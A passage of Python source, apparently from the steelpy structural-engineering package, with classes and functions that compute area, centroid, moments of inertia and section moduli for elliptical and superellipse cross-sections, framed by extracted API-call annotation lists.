'(3)'], {}), '(rmse_c, 3)\n', (4450, 4461), True, 'import numpy as np\n'), ((22907, 22917), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (22915, 22917), True, 'import matplotlib.pyplot as plt\n'), ((23740, 23768), 'utils.functions.line', 'functions.line', (['z_fit', '*popt'], {}), '(z_fit, *popt)\n', (23754, 23768), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((24877, 24887), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (24885, 24887), True, 'import matplotlib.pyplot as plt\n'), ((9850, 9869), 'numpy.round', 'np.round', (['rmse_c', '(3)'], {}), '(rmse_c, 3)\n', (9858, 9869), True, 'import numpy as np\n'), ((12734, 12753), 'numpy.round', 'np.round', (['rmse_c', '(3)'], {}), '(rmse_c, 3)\n', (12742, 12753), True, 'import numpy as np\n'), ((17385, 17405), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (17393, 17405), True, 'import numpy as np\n'), ((18021, 18041), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (18029, 18041), True, 'import numpy as np\n'), ((18116, 18136), 'numpy.round', 'np.round', (['popt[1]', '(3)'], {}), '(popt[1], 3)\n', (18124, 18136), True, 'import numpy as np\n'), ((16796, 16832), 'utils.functions.line', 'functions.line', (['dfrmse.z_true', '*popt'], {}), '(dfrmse.z_true, *popt)\n', (16810, 16832), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((23894, 23914), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (23902, 23914), True, 'import numpy as np\n'), ((24622, 24642), 'numpy.round', 'np.round', (['popt[0]', '(3)'], {}), '(popt[0], 3)\n', (24630, 24642), True, 'import numpy as np\n'), ((24725, 24745), 'numpy.round', 'np.round', (['popt[1]', '(3)'], {}), '(popt[1], 3)\n', (24733, 24745), True, 'import numpy as np\n'), ((23247, 23283), 'utils.functions.line', 'functions.line', (['dfrmse.z_true', '*popt'], {}), '(dfrmse.z_true, *popt)\n', (23261, 23283), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n')]
|
#
# Copyright (c) 2019-2021 steelpy
#
# Python stdlib imports
import math
#
# package imports
#import steelpy.units.control as units
#from steelpy.sectionproperty.shapes.iomodule import (find_section_dimensions,
# get_dimension)
# ----------------------------------------
# Elliptical Sections Profiles
# ----------------------------------------
#
class HollowSemiellipse:
"""
Calculate the section properties of a Hollow Semiellipse
with constant wall thickness Tw.
The midthickness perimeter is an ellipse 0.2 < a/b < 0.50
Parameters
----------
d : Section Heigh
b : Base
tw : Wall thickness
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
Iy : Second moment of area about mayor axis
Zey : Elastic modulus about mayor axis
Zpy : Plastic modulus about mayor axis
SFy : Shape factor mayor axis
ry : Radius of gyration about mayor Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
Zpz : Plastic modulus about minor axis
SFz : Shape factor minor axis
rz : Radius of gyration about minor Axis
SC : Shear centre
Cw : Warping constant
Notes
----------
Uses formulas from:
1.- Formulas for stress, strain and strucutral matrices [W.D. Pilkey]
2.- Roark's formulas for stress and strain [7th Edition]
3.- Wikipedia
Examples
----------
"""
#
def __init__(self):
#
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, **kwargs):
for key, value in kwargs.items():
_dim = find_section_dimensions(key)
get_dimension(self, _dim, value)
self.type = 'Hollow Semiellipse'
#
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
#
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.d *= factors[0]
#self.tw *= factors[0]
#self.a *= factors[0]
#self.ta *= factors[0]
self.b *= factors[0]
#self.tb *= factors[0]
#
_a = self.d - 0.50 * self.tw
_b = self.b / 2.0 - 0.50 * self.tw
# Note : there is a limit on the maximum
# wall thickness allowed in this case.
# Cusps will form in the perimeter at
# the ends of the mayor axis if this
# maximum is exceeded.
if _a/_b < 1.0 :
_tmax = 2 * _a**2 / _b
else: _tmax = 2 * _b**2 / _a
if self.tw > _tmax :
sys.exit('error : t > tmax')
#-------------------------------------------------
# Cross-Sectional Area
_C = (_a - _b) / (_a + _b)
_K1 = 0.2464 + 0.002222 * ((_a / _b) + (_b / _a))
_K2 = 1 - 0.3314 * _C + 0.0136 * _C**2 + 0.1097 * _C**3
_K3 = 1 + 0.9929 * _C - 0.2287 * _C**2 - 0.2193 * _C**3
self.area = ((self.tw * math.pi / 2.0) *
(_a + _b) * (1.0 + _K1 * ((_a - _b) / (_a + _b))**2))
# Centroid
self.Zc = ((2.0 * _a * _K2 / math.pi)
+ (self.tw**2 * _K3 / (6.0 * math.pi * _a)))
_Zc1 = _a + self.tw / 2.0 - self.Zc
self.Yc = 0
_Yc1 = _b + self.tw / 2.0
#-------------------------------------------------
# Section Properties
#-------------------------------------------------
# Second Moment of Area about Mayor Axis
# --------------------------------------
_K4 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_a / _b)**2
_K5 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_b / _a)**2
_Iy = ((((self.tw * _a**2 * math.pi / 8.0) * (_a + 3 * _b))
* (1 + _K4 * ((_a - _b) / (_a + _b))**2))
+ (((self.tw**3 * math.pi / 32.0) * (3 * _a + _b))
* (1 + _K5 * ((_a - _b) / (_a + _b))**2)))
self.Iy = _Iy - self.area * self.Zc**2
_K2 = 0.1349 + 0.1279 * (_b / _a) - 0.01284 * (_b / _a)**2
_K3 = 0.1349 + 0.1279 * (_a / _b) - 0.01284 * (_a / _b)**2
self.Iz = 0.50 * ((((self.tw * _b**2 * math.pi / 4.0) * (_b + 3 * _a))
* (1 + _K2 * ((_b - _a) / (_b + _a))**2))
+ (((self.tw**3 * math.pi / 16.0) * (3 * _b + _a))
* (1 + _K3 * ((_b - _a) / (_b + _a))**2)))
# Elastic Modulus about Mayor Axis
# --------------------------------------
self.Zey = self.Iy / _Zc1
#
self.Zez = self.Iz / _Yc1
# Plastic Modulus about Mayor Axis
# --------------------------------------
# Let Zp be the vertical distance from the bottom
# to the plastic neutral axis
_DD = self.tw / _tmax
_DD = max(_DD , 0.20)
_DD = min(_DD , 1.0)
if _a / _b > 0.25 and _a / _b < 1.0:
_C1 = 0.5067 - 0.5588 * _DD + 1.3820 * _DD**2
_C2 = 0.3731 + 0.1938 * _DD - 1.4078 * _DD**2
_C3 = -0.140 + 0.0179 * _DD + 0.4885 * _DD**2
_C4 = 0.0170 - 0.0079 * _DD - 0.0565 * _DD**2
#
_C5 = -0.0292 + 0.3749 * math.sqrt(_DD) + 0.0578 * _DD
_C6 = 0.36740 - 0.8531 * math.sqrt(_DD) + 0.3882 * _DD
_C7 = -0.1218 + 0.3563 * math.sqrt(_DD) - 0.1803 * _DD
_C8 = 0.01540 - 0.0448 * math.sqrt(_DD) + 0.0233 * _DD
#
elif _a / _b >= 1.0 and _a / _b < 4.0:
_C1 = 0.4829 + 0.0725 * _DD - 0.1815 * _DD**2
_C2 = 0.1957 - 0.6608 * _DD + 1.4222 * _DD**2
_C3 = 0.0203 + 1.8999 * _DD - 3.4356 * _DD**2
_C4 = 0.0578 - 1.6666 * _DD + 2.6012 * _DD**2
#
_C5 = 0.22410 - 0.3922 * math.sqrt(_DD) + 0.2960 * _DD
_C6 = -0.6637 + 2.7357 * math.sqrt(_DD) - 2.0482 * _DD
_C7 = 1.52110 - 5.3864 * math.sqrt(_DD) + 3.9286 * _DD
_C8 = -0.8498 + 2.8763 * math.sqrt(_DD) - 1.8874 * _DD
#
else :
sys.exit('error a/b > 4 or a/b < 0.25')
# Plastic neutral axis
_Zp = (_a * (_C1 + _C2 / (_a / _b) + _C3 / (_a / _b)**2
+ _C4 / (_a / _b)**3))
_Yp = 0
# Plastic section moduli mayor axis
self.Zpy = (4.0 * _a**2 * self.tw * (_C5 + _C6 / (_a / _b)
+ _C7 / (_a / _b)**2
+ _C8 / (_a / _b)**3))
# Plastic section moduli minor axis
_K4 = 0.1835 + 0.895 * (_b / _a) - 0.00978 * (_b / _a)**2
self.Zpz = (0.50 * (((1.3333 * self.tw * _b * (_b + 2 * _a))
* (1 + _K4 * ((_b - _a) / (_a + _b))**2))
+ (self.tw**3 / 3.0)))
#-------------------------------------------------
# Radius of gyration
self.ry = math.sqrt(self.Iy / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return self.area, _Zc, _Yc, _Iy, _Zey, _Zpy, _ry, _Iz, _Zez, _Zpz, _rz, _Zp
#
def print_file(self, file_name):
check_out = print_header()
check_out.append("{:23s} {:1.4E} {:1.4E}"
.format(self.type, self.d, self.tw))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
#
class EllipticalSegment:
"""
Calculate the circular and elliptical segments
cross section properties
Parameters
----------
a : Mayor Axis
b : Minor Axis
thetaG : Angle (degrees)
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
Iy : Second moment of area about mayor axis
Zey : Elastic modulus about mayor axis
ry : Radius of gyration about mayor Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
cross-sections in bending [A.J. Sadowski]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, thetaG):
#
self.a = float(a)
self.b = float(b)
self.theta = float(thetaG)
self.p = 0
self.q = 0
self.type = 'Elliptical Segment'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
self.p *= factors[0]
self.q *= factors[0]
_thetaG = math.radians(self.theta)
_thetaG = min(abs(_thetaG), 0.50 * math.pi)
# Area
self.area = (0.50 * self.a * self.b
* (2 * _thetaG - math.sin( 2 * _thetaG)))
# Centroid
self.Zc = ((4.0 * self.b * math.sin(_thetaG)**3)
/ (3.0 * (2 * _thetaG - math.sin(2 * _thetaG))))
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((self.a * self.b**3 / 16.0)
* (4 * _thetaG - math.sin(4 * _thetaG)))
# Second Moment of Area about y
self.Iz = ((self.a**3 * self.b / 24.0)
* (6.0 * _thetaG - math.sin(2 * _thetaG)
* (3.0 + 2.0 * math.sin(_thetaG)**2)))
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
# The distances from the centroid to the extreme fibres
_y1 = self.a * math.sin(_thetaG)
_z1 = self.b - self.Zc
_z2 = self.Zc - self.b * math.cos(_thetaG)
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return _Area, _Zc, _Yc, _Iy, _Zey, self.Ic, _ry, _Iz, _Zez, _Zpz, _rz
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
#
class EllipticalSector:
"""
Calculate the circular and elliptical sectors
cross section properties
Parameters
----------
a : Mayor Axis
b : Minor Axis
thetaG : Angle (degrees)
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
Iy : Second moment of area about mayor axis
Zey : Elastic modulus about mayor axis
ry : Radius of gyration about mayor Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
cross-sections in bending [<NAME>]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, thetaG):
#
self.a = float(a)
self.b = float(b)
self.theta = float(thetaG)
self.p = 0
self.q = 0
self.type = 'Elliptical Sector'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
self.p *= factors[0]
self.q *= factors[0]
_thetaG = math.radians(self.theta)
_thetaG = min(_thetaG, 0.50 * math.pi)
# Area
self.area = self.a * self.b * _thetaG
# Centroid
self.Zc = (2 * self.b * math.sin(_thetaG)) / (3 * _thetaG)
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((self.a * self.b**3 / 8.0)
* (2 * _thetaG + math.sin(2 * _thetaG)))
# Second Moment of Area about y
self.Iz = ((self.a**3 * self.b / 8.0)
* (2 * _thetaG - math.sin(2 * _thetaG)))
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
# The distances from the centroid to the extreme fibres
_y1 = self.a * math.sin(_thetaG)
_z1 = self.b - self.Zc
_z2 = self.Zc - self.b * math.cos(_thetaG)
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#
#return self.area, self.Zc, _Yc, self.Ic, _Zey, _Zpy, _ry, self.Iz, _Zez, _Zpz, _rz
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
#
class SuperEllipse:
"""
Calculate the superellipse cross section properties
Superellipses as a function of the powers p and q
Parameters
----------
a : Mayor Axis
b : Minor Axis
p :
q :
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
Iy : Second moment of area about mayor axis
Zey : Elastic modulus about mayor axis
ry : Radius of gyration about mayor Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Geometric properties for the design of unusual member
cross-sections in bending [<NAME>]
Examples
----------
"""
def __init__(self):
# Build [WELDED / ROLLED]
self.build = 'welded'
# Shear Stress [MAXIMUM / AVERAGE]
self.shear_stress = 'average'
self.compactness = 'N/A'
self.units_in = ["", "", "second", "", "", ""]
def units_input(self, **kwargs):
"""
Input:
======
length : [mandatory]
force :
temperature :
gravity : [default : 9.81ms^2]
------
units [length, mass, time, temperature, force, pressure/stress]
"""
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_in = units.units_module(_unit, value,
self.units_in)
if self.units_in[0]:
pass
else:
print('error length unit must be provided')
print(' program aborted')
sys.exit()
#
def geometry(self, a, b, p=2.0, q=2.0):
#
self.a = float(a)
self.b = float(b)
self.theta = 90
self.p = float(p)
self.q = float(q)
self.type = 'Super Ellipse'
def units_output(self, **kwargs):
"""
Input:\n
length : [mandatory]\n
force : [mandatory]\n
temperature : \n
gravity : [default : 9.81ms^2]\n
------
units [length, mass, time, temperature, force, pressure/stress]/n
"""
_units_in = ["", "", "second", "", "", ""]
for key, value in kwargs.items():
_unit = units.find_unit_case(key)
self.units_out = units.units_module(_unit, value,
_units_in)
#
def get_property(self):
#
if self.units_in[0]:
_units_input = self.units_in
else:
print(' ** error input units not provided')
print(' process terminated')
sys.exit()
# units
try:
_units_output = self.units_out
except AttributeError:
_units_output = self.units_in
self.units_out = self.units_in
factors = units.get_length_mass(_units_input,
_units_output)
self.units_in = _units_output
self.a *= factors[0]
self.b *= factors[0]
self.p *= factors[0]
self.q *= factors[0]
if self.p <= 0 or self.q <= 0:
sys.exit("error p & q > 0")
# Area
self.area = ((2.0 * self.a * self.b / self.q) *
((math.gamma(1.0 / self.q) * math.gamma((1.0 + self.p) / self.p))
/ (math.gamma((self.p + self.p * self.q + self.q) / (self.p * self.q)))))
# Centroid
self.Zc = ((math.pow(4, 1.0 / self.q) * self.b / (2 * math.sqrt(math.pi)))
* ((math.gamma((2.0 + self.q) / (2 * self.q))
* math.gamma((self.p + self.p * self.q + self.q) / (self.p * self.q)))
/ (math.gamma((2 * self.p + self.p * self.q + self.q) / (self.p * self.q)))))
self.Yc = 0
# Second Moment of Area about x
self.Iy = ((2.0 * self.a * self.b**3 / self.q) *
((math.gamma(3.0 / self.q) * math.gamma((1.0 + self.p) / self.p))
/ (math.gamma((3 * self.p + self.p * self.q + self.q) / (self.p * self.q)))))
# Second Moment of Area about y
self.Iz = ((2.0 * self.a**3 * self.b / self.p) *
((math.gamma(3.0 / self.p) * math.gamma((1.0 + self.q) / self.q))
/ (math.gamma((self.p + self.p * self.q + 3 * self.q) / (self.p * self.q)))))
#print('Jy',_Iz / 10**4)
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
#print('Jx',self.Ic / 10**4)
# The distances from the centroid to the extreme fibres
_y1 = self.a
_z1 = self.b - self.Zc
_z2 = self.Zc
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return _Area, _Zc, _Yc, self.Ic, _Zey, _Zpy, _ry, _Iz, _Zez, _Zpz, _rz
#
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta, self.p, self.q))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
#
def quarterCircle(r):
"""
Calculate a quarter of a circle
Parameters
----------
r : radius
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
Iy : Second moment of area about mayor axis
Zey : Elastic modulus about mayor axis
ry : Radius of gyration about mayor Axis
Iz : Second moment of area about minor axis
Zez : Elastic modulus about minor axis
rz : Radius of gyration about minor Axis
Notes
----------
Uses formulas from:
1.- Structural Engineering Formulas
<NAME>
Examples
----------
"""
# Area
_Area = math.pi * r**2 / 4.0
#
# Centroid
_Zc = 4 * r / (3 * math.pi)
_Yc = _Zc
# Second Moment of Area about x
_Iy = 0.07135 * r**4
_Iy1 = 0.05489 * r**4
_Iy2 = math.pi * r**4 / 16.0
# Second Moment of Area about y
_Iz = 0.03843 * r**4
_Iz1 = _Iy1
_Iz2 = _Iy2
return _Area, _Zc, _Yc, _Iy, _Iy1, _Iy2, _Iz, _Iz1, _Iz2
#
def closed_cross_section(a, b1, A1, Yc1, Ic1, Iy1,
b2 = 0, A2 = 0, Yc2 = 0,
Ic2 = 0, Iy2 = 0):
"""
Elliptical Sections Profiles Extension
Open cross-sections which are extended to half of the circumference
(thetaG = 1/2pi) may be combined together to make a hollow
closed cross-section with finite thickness t, e.g. a tube, hollow
rod, pipe or cylindrical shell,
"""
# check if section is symmetrical
if b2 == 0:
b2 = b1
A2 = A1
Yc2 = Yc1
Ic2 = Ic1
Iy2 = Iy1
_d = b1 + b2
# Total cross area
_A = A1 + A2
# Centroidal C-axis of full section
_Yc = (A1 * (Yc1 + b2) + A2 * (b2 - Yc2)) / _A
# Second moment of full area
_Ixx = ((Ic1 + A1 * (Yc1 + b2 - _Yc)**2)
+ (Ic2 + A2 * (_Yc - b2 + Yc2)**2))
_Iyy = Iy1 + Iy2
# Extreme fibre distances
_x1 = a
_y1 = _d - _Yc
_y2 = _Yc
# Elastic section moduli
_Sy = min(_Iyy / _y1, _Iyy / _y2)
_Sx = _Ixx / _x1
# radii of gyration
_ry = math.sqrt(_Iyy / _A)
_rx = math.sqrt(_Ixx / _A)
#
return _A, _Yc, _x1, _Ixx, _Sx, _rx, _Iyy, _Sy, _ry
#
#
def hollow_ellipse(a, b, t):
"""
a
b
t
"""
# Area
K1 = 0.2464 + 0.002222 * (a/b + b/a)
Area = math.pi * t * (a + b) * (1 + K1 * ((a-b)/(a+b))**2)
# Centroid
Zc = a + t / 2.0
Yc = b + t / 2.0
# Second Moment of Area about Mayor Axis
# --------------------------------------
K2 = 0.1349 + 0.1279 * a/b - 0.01284 * (a/b)**2
K3 = 0.1349 + 0.1279 * b/a - 0.01284 * (b/a)**2
Iy = (math.pi * t * a**2 / 4.0 * (a + 3*b) * (1 + K2 * ((a-b)/(a+b))**2)
+ math.pi * t**3 / 16.0 * (3*a + b) * (1 + K3 * ((a-b)/(a+b))**2))
# Second Moment of Area about Minor Axis
# --------------------------------------
K2 = 0.1349 + 0.1279 * b/a - 0.01284 * (b/a)**2
K3 = 0.1349 + 0.1279 * a/b - 0.01284 * (a/b)**2
Iz = (math.pi * t * b**2 / 4.0 * (b + 3*a) * (1 + K2 * ((b-a)/(b+a))**2)
+ math.pi * t**3 / 16.0 * (3*b + a) * (1 + K3 * ((b-a)/(b+a))**2))
# Elastic Modulus about Mayor Axis
# --------------------------------------
K4 = 0.1835 + 0.895 * a/b - 0.00978 * (a/b)**2
Zey = 1.3333 * t * a * (a + 2*b) * (1 + K4 * ((a-b)/(a+b))**2) + t**3 / 3.0
# Elastic Modulus about Minor Axis
# --------------------------------------
K4 = 0.1835 + 0.895 * b/a - 0.00978 * (b/a)**2
Zez = 1.3333 * t * b * (b + 2*a) * (1 + K4 * ((b-a)/(b+a))**2) + t**3 / 3.0
return Area, Zc, Yc, Iy, Zey, Iz, Zez
|
[
"math.sqrt",
"math.pow",
"math.radians",
"math.sin",
"math.gamma",
"math.cos"
] |
[((29284, 29304), 'math.sqrt', 'math.sqrt', (['(_Iyy / _A)'], {}), '(_Iyy / _A)\n', (29293, 29304), False, 'import math\n'), ((29315, 29335), 'math.sqrt', 'math.sqrt', (['(_Ixx / _A)'], {}), '(_Ixx / _A)\n', (29324, 29335), False, 'import math\n'), ((9265, 9295), 'math.sqrt', 'math.sqrt', (['(self.Iy / self.area)'], {}), '(self.Iy / self.area)\n', (9274, 9295), False, 'import math\n'), ((9314, 9344), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (9323, 9344), False, 'import math\n'), ((13476, 13500), 'math.radians', 'math.radians', (['self.theta'], {}), '(self.theta)\n', (13488, 13500), False, 'import math\n'), ((14824, 14854), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (14833, 14854), False, 'import math\n'), ((14873, 14903), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (14882, 14903), False, 'import math\n'), ((19014, 19038), 'math.radians', 'math.radians', (['self.theta'], {}), '(self.theta)\n', (19026, 19038), False, 'import math\n'), ((20164, 20194), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (20173, 20194), False, 'import math\n'), ((20213, 20243), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (20222, 20243), False, 'import math\n'), ((26282, 26312), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (26291, 26312), False, 'import math\n'), ((26331, 26361), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (26340, 26361), False, 'import math\n'), ((14465, 14482), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (14473, 14482), False, 'import math\n'), ((19805, 19822), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (19813, 19822), False, 'import math\n'), ((13660, 13681), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (13668, 13681), False, 'import math\n'), ((14000, 14021), 'math.sin', 'math.sin', (['(4 * _thetaG)'], {}), '(4 * _thetaG)\n', (14008, 14021), False, 'import math\n'), ((14547, 14564), 'math.cos', 'math.cos', (['_thetaG'], {}), '(_thetaG)\n', (14555, 14564), False, 'import math\n'), ((19216, 19233), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (19224, 19233), False, 'import math\n'), ((19403, 19424), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (19411, 19424), False, 'import math\n'), ((19559, 19580), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (19567, 19580), False, 'import math\n'), ((19887, 19904), 'math.cos', 'math.cos', (['_thetaG'], {}), '(_thetaG)\n', (19895, 19904), False, 'import math\n'), ((24641, 24708), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (24651, 24708), False, 'import math\n'), ((25005, 25076), 'math.gamma', 'math.gamma', (['((2 * self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((2 * self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (25015, 25076), False, 'import math\n'), ((25314, 25385), 'math.gamma', 'math.gamma', (['((3 * self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((3 * self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (25324, 25385), False, 'import math\n'), ((25603, 25674), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + 3 * self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + 3 * self.q) / (self.p * self.q))\n', (25613, 25674), False, 'import math\n'), ((13748, 13765), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (13756, 13765), False, 'import math\n'), ((13813, 13834), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (13821, 13834), False, 'import math\n'), ((14159, 14180), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (14167, 14180), False, 